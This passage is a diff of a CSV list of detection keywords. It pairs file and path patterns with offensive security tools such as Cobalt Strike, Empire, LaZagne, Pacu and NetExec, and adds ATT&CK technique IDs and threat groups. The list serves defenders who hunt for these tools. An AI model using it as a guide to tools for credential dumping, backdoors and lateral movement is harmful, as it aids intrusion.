 "*/kronos.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - 
T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z"
 "*/kubesploit.git*","offensive_tool_keyword","kubesploit","Kubesploit is a cross-platform post-exploitation HTTP/2 Command & Control server and agent written in Golang","T1021.001 - T1027 - T1071.001 - T1043 - T1059.006","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://github.com/cyberark/kubesploit","1","1","N/A","10","10","1030","102","2023-04-08T08:32:23Z","2021-02-09T15:54:23Z"
@@ -4159,86 +4183,89 @@
 "*/Ladon/Ladon.*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
 "*/Ladon/obj/x86*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
 "*/LadonGo/*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z"
-"*/lambda__backdoor_new_roles*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*/lambda__backdoor_new_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
-"*/lambda__backdoor_new_users*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for 
testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/lambda__backdoor_new_roles*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/lambda__backdoor_new_sec_groups*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
+"*/lambda__backdoor_new_users*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z"
 "*/LambdaLooter.py*","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tools","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","1","64","14","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z"
-"*/lanattacks/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z"
+"*/lanattacks/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
 "*/laps.py *--ldapserver*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z"
 "*/laps.py *-u * -p *","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","0","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z"
-"*/laps_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
+"*/laps.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
+"*/laps_dump_*.txt*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a 
number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
 "*/LAPSDumper.git*","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","222","34","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z"
-"*/lastpass.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","731","94","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
+"*/lastpass.py*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z"
 "*/Lateral/SMB.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z"
-"*/lateral_movement/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*/lateral_movement/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1092","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
-"*/laZagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8527","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z"
-"*/LaZagne/Windows/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7841","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
-"*/ldap.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11786","3291","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
+"*/lateral_movement/*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1052","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*/lateral_movement/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1092","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*/laZagne.py*","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","8530","1980","2023-08-12T12:38:22Z","2015-02-16T14:10:02Z"
+"*/LaZagne/Windows/*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*/ldap.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z"
 "*/ldap_injection.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","","N/A","","",""
 "*/ldap_search_bof.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z"
 "*/ldap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ldap-checker.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z"
 "*/ldap-novell-getpass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
-"*/LdapRelayScan.git*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","389","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z"
+"*/LdapRelayScan.git*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z"
 "*/ldap-rootdse.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/ldap-search.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
 "*/ldapsearch-ad.git*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z"
-"*/LDAPWordlistHarvester.git*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","218","14","2023-10-01T21:12:10Z","2023-09-22T10:10:10Z"
+"*/LDAPWordlistHarvester.git*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z"
 "*/ldeep/*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z"
-"*/ldeepDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - 
T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1384","210","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z"
